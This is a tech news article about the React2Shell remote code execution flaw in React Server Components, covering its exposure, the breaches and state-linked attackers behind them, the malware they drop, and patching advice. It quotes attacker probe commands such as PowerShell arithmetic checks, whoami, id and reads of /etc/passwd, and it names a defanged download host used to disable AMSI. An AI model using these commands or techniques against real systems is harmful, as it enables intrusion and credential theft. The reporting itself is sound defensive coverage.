React2Shell Vulnerability: 30 Orgs Breached, 77K IPs at Risk

by priyanka.patel tech editor
written by priyanka.patel tech editor

React2Shell Flaw: Over 77,000 Systems Vulnerable to Critical Remote Code Execution

A critical remote code execution vulnerability, dubbed React2Shell (CVE-2025-55182), is impacting over 77,000 internet-exposed systems, with confirmed compromises already affecting more than 30 organizations across multiple sectors.

The flaw, an unauthenticated remote code execution vulnerability exploitable with a single HTTP request, affects all frameworks implementing React Server Components, including the widely used Next.js. React disclosed the vulnerability on December 3rd, attributing it to unsafe deserialization of client-controlled data within React Server Components, allowing attackers to trigger arbitrary command execution.

Developers are urged to immediately update to the latest React version, rebuild their applications, and redeploy to mitigate the risk. The rapid escalation of exploitation began on December 4th, following the publication of a working proof-of-concept by security researcher Maple3142. This quickly led to automated scanning and exploitation attempts.

Widespread Vulnerability and Initial Compromises

Shadowserver, an internet watchdog group, has identified 77,664 IP addresses currently vulnerable to the React2Shell flaw, with approximately 23,700 located in the United States. The detection method, developed by Searchlight Cyber/Assetnote, involves sending HTTP requests designed to exploit the vulnerability and verifying a specific response to confirm susceptibility.

GreyNoise has recorded 181 distinct IP addresses actively scanning for the flaw in the past 24 hours, with the majority of activity originating from the Netherlands, China, the United States, Hong Kong, and several other countries. According to reports, the scans appear largely automated.

Palo Alto Networks indicates that over 30 organizations have already been compromised, with attackers leveraging the vulnerability to execute commands, conduct reconnaissance, and attempt to steal sensitive AWS configuration and credential files. Disturbingly, some of these intrusions have been linked to Chinese state-associated threat actors.

Attack Patterns and Malware Deployment

Since the vulnerability’s disclosure, researchers have observed widespread exploitation of CVE-2025-55182. GreyNoise reports that attackers often initiate probes with PowerShell commands performing basic mathematical functions – such as powershell -c "40138*41979" and powershell -c "40320*43488" – to confirm the presence of the remote code execution flaw with minimal traces.

Once successful, attackers are deploying base64-encoded PowerShell commands to download additional scripts directly into memory. One observed instance involved a PowerShell script sourced from 23[.]235[.]188[.]3, designed to disable AMSI (Anti-Malware Scan Interface) and facilitate the deployment of further payloads.

VirusTotal analysis reveals that this script installs a Cobalt Strike beacon, providing threat actors with a persistent foothold on compromised networks. Amazon AWS threat intelligence teams have also detected rapid exploitation linked to China-affiliated Advanced Persistent Threat (APT) groups, including Earth Lamia and Jackpot Panda. These actors are performing reconnaissance using commands like whoami and id, attempting file creation, and reading system files such as /etc/passwd.

Palo Alto Networks attributes some of the observed activity to UNC5174, a Chinese state-sponsored threat actor believed to be connected to the Chinese Ministry of State Security. “Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security,” a Senior Manager at Palo Alto Networks Unit 42 told BleepingComputer via email. The deployed malware includes:

  • Snowlight: A malware dropper used to deploy additional payloads on breached systems.
  • Vshell: A backdoor commonly employed by Chinese hacking groups for remote access, post-exploitation activities, and lateral movement within compromised networks.

Patching Efforts and Ongoing Risks

The severity of the React flaw has prompted a global rush to implement patches and mitigations. Cloudflare recently deployed emergency detections and mitigations within its Web Application Firewall (WAF), but an initial update inadvertently caused a service outage before being corrected.

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies apply patches by December 26, 2025, under Binding Operational Directive 22-01.

Organizations utilizing React Server Components or frameworks built upon them are strongly advised to immediately update their systems, rebuild and redeploy applications, and meticulously review logs for any indications of PowerShell or shell command execution. The widespread exploitation and the involvement of state-sponsored actors underscore the critical need for swift and comprehensive remediation efforts.

Priyanka Patel – Technology Editor

Former software engineer turned tech reporter. Explores AI, cybersecurity, gadgets and start-up culture.

Leave a Comment